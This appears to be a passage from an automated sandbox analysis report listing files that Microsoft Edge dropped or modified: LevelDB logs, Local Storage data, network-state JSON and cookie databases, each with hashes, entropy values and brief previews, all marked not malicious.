                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:34.980 650 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/20-01:31:34.982 650 Recovering log #3.2024/12/20-01:31:34.982 650 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):409
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2687467808755555
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:FsO4vVaYeb8rcHEZrELFUt86s4J/+6s4D5OaYeb8rcHEZrEZSJ:FeVaYeb8nZrExg86VTVVOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                MD5:55F63690315B5575A052496E6DDB87C2
                                                                                                                                                                                                                                                                                                SHA1:D57C87DB04260F6DD46517262BEE9A64424DD278
                                                                                                                                                                                                                                                                                                SHA-256:C0462AB7F90D8EE3E71208ED977BED036A64A35A433DDA7D3FC8480CEEA7F606
                                                                                                                                                                                                                                                                                                SHA-512:D569CE15865D3E452DBDDAD2F45F6D4D04440CFAF58524F965A4E0575FE6FB9BDD107E8BBCF3E0377B3E166C93FCF1CE8CDF15FCAE243AE4B1F85A2E2BBC3348
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:34.980 650 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/20-01:31:34.982 650 Recovering log #3.2024/12/20-01:31:34.982 650 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1657
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.6334244970904335
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:xtZ67tntaOk2KcXZ1bV03Sx4Lyls5BAyPK7AHHk2GJ341:xtQFJQGTD2osZdP1
                                                                                                                                                                                                                                                                                                MD5:834FFE60531A5F2598750EC0D2A8480A
                                                                                                                                                                                                                                                                                                SHA1:22FC38AB4C8F6CEB8C34A88187196E7525FBF917
                                                                                                                                                                                                                                                                                                SHA-256:8A5E8B56EBE78CBBEA159F2507F176AE1A434AD0CB4FFD567D4289100143E61A
                                                                                                                                                                                                                                                                                                SHA-512:5427FD247FA94D4C8984365808656A74F925AB14A80D2A30217E662F038D6195AF9B7F035729EA8A9E2544E0D85DD0F9D434EE398FD4273E5D2C14BC051B74EB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..c6................VERSION.1..META:https://ntp.msn.com..............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":771}.!_https://ntp.msn.com..LastKnownPV..1734676308105.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734676309068.._https://ntp.msn.com..MUID!.015EFEE8056263FB2030EBB304006296.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734676308183,"schedule":[-1,22,-1,-1,-1,9,27],"scheduleFixed":[-1,22,-1,-1,-1,9,27],"simpleSchedule":[41,42,9,13,12,44,43]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734676308074.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241219.380"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https:

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):340
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.163183831487284
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PywiFlyq2PN723oH+Tcwt8a2jMGIFUt8IyJU1Zmw+I+AlRkwON723oH+Tcwt8a23:1iFlyvVaYeb8EFUt8zK/+8lR5OaYeb8N
                                                                                                                                                                                                                                                                                                MD5:F4ED23379AB5BECED9D41FD12DB17F7F
                                                                                                                                                                                                                                                                                                SHA1:1D1BD6296BED03F2D01D7D7CE6F939E55EAA166C
                                                                                                                                                                                                                                                                                                SHA-256:D7F170C86D3756E405EF0720E93F478C6FFB4FFA4403B4D620E7693F8BEFC98A
                                                                                                                                                                                                                                                                                                SHA-512:C5F6120DA755007EB6482F1331A34131D27793C31B580E1611A5F2205A8290F544616D7EA96012152F7FECE582496F87ED06EB13730FE3A8CB0F577B19CC6902
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.885 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-01:31:31.886 1c74 Recovering log #3.2024/12/20-01:31:31.897 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):340
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.163183831487284
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PywiFlyq2PN723oH+Tcwt8a2jMGIFUt8IyJU1Zmw+I+AlRkwON723oH+Tcwt8a23:1iFlyvVaYeb8EFUt8zK/+8lR5OaYeb8N
                                                                                                                                                                                                                                                                                                MD5:F4ED23379AB5BECED9D41FD12DB17F7F
                                                                                                                                                                                                                                                                                                SHA1:1D1BD6296BED03F2D01D7D7CE6F939E55EAA166C
                                                                                                                                                                                                                                                                                                SHA-256:D7F170C86D3756E405EF0720E93F478C6FFB4FFA4403B4D620E7693F8BEFC98A
                                                                                                                                                                                                                                                                                                SHA-512:C5F6120DA755007EB6482F1331A34131D27793C31B580E1611A5F2205A8290F544616D7EA96012152F7FECE582496F87ED06EB13730FE3A8CB0F577B19CC6902
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.885 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-01:31:31.886 1c74 Recovering log #3.2024/12/20-01:31:31.897 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\173f49f4-fd6a-4272-bd51-5a99421ced22.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4f7ea4cf-926b-42b8-9a5b-91ec3eb2f993.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6a82b066-0a0e-4bfa-8ca2-b2a13d05ddcf.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):1747
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.304563802412381
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YcCpfgCzs6tsdfcKsRleeIkBRsVCgHxeYhbm:F2ftKqkeIkBmTJhK
                                                                                                                                                                                                                                                                                                MD5:08EEE8FEA5F237AF55738C11516E773C
                                                                                                                                                                                                                                                                                                SHA1:E482815B270A93ABBE52F5A86A13BEEB42277D12
                                                                                                                                                                                                                                                                                                SHA-256:9CE924F5D9CE433FF7606F48E1102E1AF6BBABB3B057C106EE3AE8BE86DDCDA9
                                                                                                                                                                                                                                                                                                SHA-512:EA3884148105E6EB6FF997249129130E7B95465CF21C5C10A882A3AF7529879910E6E0356668B67034DE2E9C9837F2BB6AC26442848173FBBA830840A83B8F16
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381741895740429","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381741899520857","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379243502383431","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.768628338935642
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:tTjmZhY+8Dpx/JCgVQxLbUoobYglGXcf0L/ZJVb:VjKhiD3/JCgVULb9gUXI0LhJVb
                                                                                                                                                                                                                                                                                                MD5:FC50CEC91D94FB80367861BD9C278B14
                                                                                                                                                                                                                                                                                                SHA1:98BFBDA85312AE60BD93CA51FCF2C3845871BBDD
                                                                                                                                                                                                                                                                                                SHA-256:197A6667CAEBE8CF5D9A80100E19F52421DB8C435879E54B5A88CF89F6059DC1
                                                                                                                                                                                                                                                                                                SHA-512:7CC75E737A5C51B5CC325DDD5EDE6DF7B2A693706F7D63761566E2A22AECB2FC7B1972F971BB9085E8D0D01A494C43F515C2B69BBC63DAC1A6C2010402370BC8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4e23e.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.3780154367115918
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB5R:JkIEumQv8m1ccnvS6JK+lGFh51haw1a
                                                                                                                                                                                                                                                                                                MD5:BEF012FA590794516E9AAC90F428CAAB
                                                                                                                                                                                                                                                                                                SHA1:8640463349A5AA82ABCB83F60911BF9621C39C09
                                                                                                                                                                                                                                                                                                SHA-256:892E49E695B9244AF5CFCC4532DA7820767DB6DAC08C0F17945FAB35DEC3FD79
                                                                                                                                                                                                                                                                                                SHA-512:753CD910527A81227C4678231F5EC5F0B027164731CBF03C176E0E63F56A10EFC66D129E1B21409BCA97B558774EBD54DD05EF1D03350C35F6EA9D3FDA1DEE25
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3cbbd.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3e734.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d9d35fb4-b6e7-4c29-9484-8f6b89e91354.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dea14027-da1a-4c8d-b14f-1c20f5a4d1a5.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
